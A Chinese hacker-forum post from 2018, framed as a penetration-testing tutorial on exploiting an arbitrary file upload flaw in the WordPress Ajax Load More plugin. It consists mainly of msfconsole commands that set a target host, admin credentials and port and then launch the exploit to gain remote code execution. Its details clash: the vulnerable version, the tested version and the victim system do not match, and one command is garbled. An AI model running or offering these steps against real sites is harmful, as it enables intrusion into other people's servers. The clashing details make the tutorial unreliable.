渗透测试实战教程:如何利用WordPress的Ajax插件的文件上传漏洞进行多文件上传(文件上传漏洞)

zevseo
4450zevseo大版主
2018-09-11 02:55:11
4450 2018-09-11 02:55:11
此模块利用WordPress Ajax Load更多版本2.8.1.1中的任意文件上传漏洞。它允许上传任意php文件并获得远程代码执行。
在Ubuntu 12.04 / 14.04服务器上使用WordPress 4.1.3对WordPress Ajax加载更多2.8.0进行了成功测试。
利用目标
WordPress Ajax加载更多2.8.0
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole

描述:如何利用WordPress的Ajax插件的文件上传漏洞进行多文件上传


现在输入  exploit use / unix / webapp / wp_ ajax_load_more_file_upload
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set targeturi /wordpress
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set rhost 192.168.0.110 (远程主机的ip)
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_username admin
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set wp_password admin123
msf exploit (wp_ajax­­­­­_load_more_file_upload)>set rport 80
msf exploit (wp_ajax­­­­­_load_more_file_upload)>exploit
如何利用WordPress的Ajax插件的文件上传漏洞进行多文件上传

描述:如何利用WordPress的Ajax插件的文件上传漏洞进行多文件上传


本文标题:渗透测试实战教程:如何利用WordPress的Ajax插件的文件上传漏洞进行多文件上传(文件上传漏洞)
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2315.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan